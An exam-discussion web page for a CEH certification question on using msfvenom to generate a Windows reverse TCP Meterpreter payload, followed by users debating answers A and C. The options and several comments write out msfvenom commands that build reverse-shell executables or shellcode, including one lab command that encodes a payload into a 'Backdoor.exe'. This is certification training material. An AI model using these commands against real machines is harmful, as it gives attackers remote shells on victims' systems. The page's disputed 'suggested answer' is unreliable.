Welcome to ExamTopics
ExamTopics Logo
- Expert Verified, Online, Free.

Unlimited Access

Get Unlimited Contributor Access to the all ExamTopics Exams!
Take advantage of PDF Files for 1000+ Exams along with community discussions and pass IT Certification Exams Easily.

Exam 312-50v11 topic 1 question 138 discussion

Actual exam question from ECCouncil's 312-50v11
Question #: 138
Topic #: 1
[All 312-50v11 Questions]

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

  • A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  • B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  • C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  • D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
Show Suggested Answer Hide Answer
Suggested Answer: C 🗳️

Comments

Chosen Answer:
This is a voting comment (?) , you can switch to a simple comment.
Switch to a voting comment New
Scryptic
Highly Voted 2 years, 7 months ago
View an example here: https://netsec.ws/?p=331 (Search for the "Windows" example. so you can understand what the different arguments mean (Like LHOST, LPORT) L=Local, R= Remote
upvoted 11 times
...
gtlusciak
Highly Voted 2 years, 6 months ago
Not sure about this one, "C" will generate a reverse shell file, but "A" will produce a reverse shellcode that you can use in Buffer Overflow so I think the correct answer is "A"
upvoted 10 times
...
07085b9237
Most Recent 1 month, 3 weeks ago
Selected Answer: C
..TRRRRRRR
upvoted 1 times
...
shubhrant666
5 months, 1 week ago
Selected Answer: C
.EXE FOR WINDOWS
upvoted 1 times
...
DataTraveler
6 months, 2 weeks ago
Selected Answer: C
Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.13 -f exe > Desktop/Backdoor.exe and press Enter. P. 4048/609 (Lab Manual)
upvoted 3 times
YourFriendlyNeighborhoodSpider
5 months, 2 weeks ago
Thank you for the clarification! :) God bless you!
upvoted 2 times
...
...
Vincent_Lu
8 months ago
Selected Answer: C
If the question is "What is ... shellcode", I will choose A. However, it's "What is ... shellcode for Windows". That's why I choose C
upvoted 1 times
...
CHCHCHC
8 months, 1 week ago
The answer is C. if you did any lab from module 6, system hacking, you would be executing this code for many times to create a reverse shell executable for windows.
upvoted 1 times
...
botty
9 months, 1 week ago
Selected Answer: C
as they are asking for windows, we should create payload with .ece extension, so answer is C
upvoted 1 times
...
Melendez
11 months, 2 weeks ago
Selected Answer: A
You are using C code to reverse shell to a windows machine.
upvoted 2 times
...
Muli_70
11 months, 4 weeks ago
The correct answer is A: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c This command will generate a Windows shellcode that creates a reverse Meterpreter TCP connection to the IP address 10.10.10.30 on port 4444. The "-f c" option specifies that the output format should be C language code that can be used in exploits.
upvoted 1 times
...
Yovecio
12 months ago
It's C because it's mentioning about Windows and -f c will not be executable
upvoted 2 times
...
Timebear
12 months ago
The correct answer is: A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c Explanation: The option -p specifies the payload to be used, in this case, windows/meterpreter/reverse_tcp, which generates a reverse TCP shellcode for Windows using the Meterpreter payload. The option LHOST specifies the local host IP address that the reverse shell will connect back to. The option LPORT specifies the local port on which the reverse shell will connect back to. The option -f specifies the output format of the generated payload, in this case, c which generates the payload in C language format. Option A is the correct one because it specifies the correct payload, LHOST, LPORT, and output format for generating a reverse TCP shellcode using msfvenom for Windows. Option B uses RHOST instead of LHOST, which would be used for specifying the remote host IP address, not the local host IP address for the reverse shell to connect back to. Option C and D use exe as the output format, which generates an executable file, not a C language format as specified in the question.
upvoted 1 times
...
MrSHacker
1 year, 1 month ago
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
upvoted 2 times
...
Sri0908
1 year, 1 month ago
Selected Answer: A
The correct way of using MSFvenom to generate a reverse TCP shellcode for Windows is: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f <format> Where LHOST is the local IP address where the shell should connect back to, LPORT is the local port number to use for the connection, and <format> is the output format, such as c, exe, or raw. Therefore, the correct option is A: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c.
upvoted 2 times
...
CyberMalware
1 year, 1 month ago
Selected Answer: C
c is correct
upvoted 1 times
...
lau2123
1 year, 1 month ago
The correct way of using MSFvenom to generate a reverse TCP shellcode for Windows is: A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c Explanation: This command generates a Windows Meterpreter reverse TCP shellcode that will connect back to the IP address specified in LHOST and the port specified in LPORT. The -f option specifies the output format as C code. Option B is incorrect because RHOST is not a valid option for generating a reverse TCP payload; it is used for specifying the remote host to connect to when exploiting a target. Options C and D are both valid for generating an executable file containing the payload, but they do not generate the raw shellcode itself.
upvoted 2 times
...
josevirtual
1 year, 3 months ago
Selected Answer: A
Since it asks for shellcode, Windows or not it has to be A. C creates an executable, not shellcode.
upvoted 4 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
Loading ...